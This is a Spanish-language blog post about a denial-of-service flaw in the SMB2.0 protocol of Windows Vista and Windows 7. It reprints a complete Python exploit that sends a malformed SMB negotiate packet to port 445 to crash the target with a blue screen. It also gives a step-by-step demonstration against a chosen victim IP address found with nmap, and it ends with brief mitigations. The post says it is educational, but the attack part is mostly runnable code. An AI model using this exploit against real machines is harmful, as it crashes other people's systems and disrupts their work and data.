Denial Of service en Windows Vista y Windows 7

Leyendo securitybydefault me encuentro con esta importante noticia, recientemente se encontro un fallo de seguridad  en el protocolo SMB de Windows Vista y Windows 7, este es el encargado de compartir archivos e impresoras  en los sistemas operativos de microsoft. Este bug, permite hacer un ataque DoS  (e incluso es posible la ejecucion remota de codigo) de forma remota mandando un paquete malformado. El ataque sera reflejado en el PC victima  con el ya conocido, tipico y normal “error de pantalla azul”, obligandolo a reiniciar.

Laurent Gaffié, quien descrubrio esta vulnerabilidad, ha creado un pequeño codigo en python, que permite explotar dicho bug,  lo unico necesario es tener la IP victima,  y que este por obvias razones este compartiendo archivos o impresoras, es decir, que tenga activado  el protocolo SMB 2.0 . el codigo es el siguiente:

#!/usr/bin/python
#When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host =”direccion_ip”, 445
buff = (
“\x00\x00\x00\x90” # Begin SMB header: Session message
“\xff\x53\x4d\x42” # Server Component: SMB
“\x72\x00\x00\x00” # Negociate Protocol
“\x00\x18\x53\xc8” # Operation 0x18 & sub 0xc853
“\x00\x26″# Process ID High: –> 🙂 normal value should be “\x00\x00”
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54”
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31”
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00”
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57”
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61”
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00”
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Para lanzarlo basta con ./archivo.py

No sobra  decir, que este bug, no afecta versiones anteriores de Windows.

Prueba de concepto.

Antes que nada, es necesario advertir, que esta prueba se hace con el UNICO fin  de educar y alertar a los usuarios de Microsoft Windows, para que esten atentos y tomen las medidas pertinentes para no ser victimas de algun l@mmer  lanzando ataques a diestra y siniestra.

El escenario es el siguiente:

Previamente se ha identificado nuestro objetivo, se ha obtenido su ip la cual es 192.168.8.120, gracias a un nmap estamos seguros de que sus sistema operativo es Windows Vista  y que tiene SMB activado.

Teniendo clara la ip de nuestra victima, modificamos el codigo en python y ponemos nuestra  ip victima en este caso 192.168.8.120, guardamos, procedemos a darle permisos a nuestro archivo y por ultimo lo ejecutamos:

chmod 777 archivo.py
./archivo.py

Como resultado en nuestra pc victima saldra un BSOD (Blue Screen of death), algo similar a este:

Soluciones.

Hasta el momento no existe parche por parte de Microsoft, sin embargo, este grave problema se puede solucionar de manera provisional deshabilitando SMB. o en su defecto filtrando los puertos 445 y 139. Asi que todos los usuarios de windows esten pendientes de este fallo y actualicen su sistema lo antes posible,  para evitar daños  y perdidas de informacion

One Comment